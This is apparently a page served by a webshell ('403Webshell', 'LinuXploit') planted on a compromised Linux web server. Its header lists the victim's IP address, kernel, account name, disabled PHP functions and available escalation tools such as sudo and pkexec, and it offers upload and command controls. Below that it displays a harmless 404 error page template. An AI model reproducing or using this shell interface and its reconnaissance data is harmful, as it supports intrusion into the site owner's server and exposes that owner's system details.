403Webshell
Server IP : 51.89.169.208  /  Your IP : 216.73.216.9
Web Server : Apache
System : Linux ns3209505.ip-198-244-202.eu 4.18.0-553.27.1.el8_10.x86_64 #1 SMP Tue Nov 5 04:50:16 EST 2024 x86_64
User : yellowleaf ( 1019)
PHP Version : 7.4.33
Disable Function : exec,passthru,shell_exec,system
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/yellowleaf/public_html/404/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/yellowleaf/public_html/404/index_tpl.2.0.html
<?php
require('../connect.php');
session_start();
$styleTerms = 'class="navBoxSel"';
?>
<!DOCTYPE html>
<html>
  <head>
    <meta http-equiv="Content-Type" content="text/html; charset=windows-1252" />
    <title>404 ERROR</title>
    <link rel="stylesheet" href="/404/index.css" />
  </head>

  <body>
    <section>
      <div class="bg-images">
        <img
          style="--i: 0s"
          src="./img/london-skyline-aerial-view-sunset.jpg"
          alt=""
        />
        <img
          style="--i: 5s"
          src="./img/big-ben-westminster-bridge-sunset-london-uk.jpg"
          alt=""
        />
        <img
          style="--i: 10s"
          src="./img/aerial-view-liverpool-from-view-point-united-kingdom-old-modern-buildings.jpg"
          alt=""
        />
        <img
          style="--i: 15s"
          src="./img/london-eye-with-river-thames.jpg"
          alt=""
        />
      </div>
      <div class="error-wrapper">
        <div class="error-box">
          <h1>Error<span class="number-error">999</span></h1>
          <p>
            It's looking like you may have taken a wrong turn. Don't worry... It
            happens to the best of us.
          </p>
          <div class="error-buttons">
            <a href="/" class="btn btn-outline-white">Back Home</a>
          </div>
        </div>
      </div>
    </section>

    <script
      src="https://code.jquery.com/jquery-3.6.0.min.js"
      integrity="sha256-/xUj+3OJU5yExlq6GSYGSHk7tPXikynS7ogEvDej/m4="
      crossorigin="anonymous"
    ></script>
    <script>
      var numArr = [
        999, 998, 997, 996, 995, 994, 984, 974, 964, 954, 944, 934, 924, 914,
        904, 804, 704, 604, 504, 404,
      ];
      var i = 0;

      var timer = setInterval(function () {
        $(".number-error").text(numArr[i]);
        if (i >= numArr.length - 1) {
          clearInterval(timer);
          $(".number-error").addClass("shake");
          return;
        }
        i++;
      }, 50);
    </script>
  </body>
</html>

Youez - 2016 - github.com/yon3zu
LinuXploit